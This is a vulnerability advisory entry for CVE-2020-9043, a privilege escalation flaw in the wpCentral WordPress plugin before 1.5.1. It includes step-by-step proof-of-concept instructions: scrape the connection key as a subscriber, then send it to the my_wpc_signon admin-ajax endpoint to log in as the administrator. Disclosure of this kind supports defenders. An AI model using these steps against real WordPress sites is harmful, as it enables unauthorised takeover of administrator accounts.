Lucene search
Chloe ChamberlandWPEX-ID:3789DEF3-BA22-45D9-9951-BA51684257BAHistoryFeb 17, 2020 - 12:00 a.m.
wpCentral < 1.5.1 - Improper Access Control to Privilege Escalation
2020-02-1700:00:00
Chloe Chamberland
9
0.038 Low
EPSS
Percentile
91.9%
The flaw allowed anybody to escalate their privileges to those of an administrator, as long as subscriber-level registration was enabled on a given WordPress site with the vulnerable plugin installed.
1. Log in as Subscriber.
2. Scrape the page (/wp-admin/index.php) for the connection key. (i.e. view source and search for "Connection Key") Copy the key.
Excerpt:
<div style="text-align:center; font-weight:bold;"><p style="margin-bottom: 4px;margin-top: 20px;">wpCentral Connection Key</p></div>
<div style="padding: 10px;background-color: #fafafa;border: 1px solid black;border-radius: 10px;font-weight: bold;font-size: 14px;text-align: center;">lsgp0jlf3hjnaudtozswglpdva4xodnd94hcu5qb81dzdpt4y3iagwerwbwukmcw78g2dihphluqxagvo7dmm0igxamp2cw58jan0jvjhmv7dh953ububhnuimkgnmlk</div>
</div><script type="text/javascript">
Extracted key:
lsgp0jlf3hjnaudtozswglpdva4xodnd94hcu5qb81dzdpt4y3iagwerwbwukmcw78g2dihphluqxagvo7dmm0igxamp2cw58jan0jvjhmv7dh953ububhnuimkgnmlk
Log out.
3. Send the following request with the connection key pasted where it says "Auth_key_here" /wp-admin/admin-ajax.php?action=my_wpc_signon&auth_key=[AUTH_KEY_HERE]
4. Should now be logged in as user 1 -- presumably administrative user.Related
openvas
openvas
WordPress wpCentral Plugin < 1.5.1 Improper Access Control Vulnerability
2020-02-25 00:00:00
wpvulndb
wpvulndb
wpCentral < 1.5.1 - Improper Access Control to Privilege Escalation
2020-02-17 00:00:00
cvelist
cvelist
CVE-2020-9043
2020-02-17 16:53:52
patchstack
patchstack
prion
prion
Design/Logic Flaw
2020-02-17 17:15:00
nuclei
nuclei
WordPress wpCentral <1.5.1 - Information Disclosure
2022-07-23 14:45:35
nvd
nvd
CVE-2020-9043
2020-02-17 17:15:15
cve
cve
CVE-2020-9043
2020-02-17 17:15:15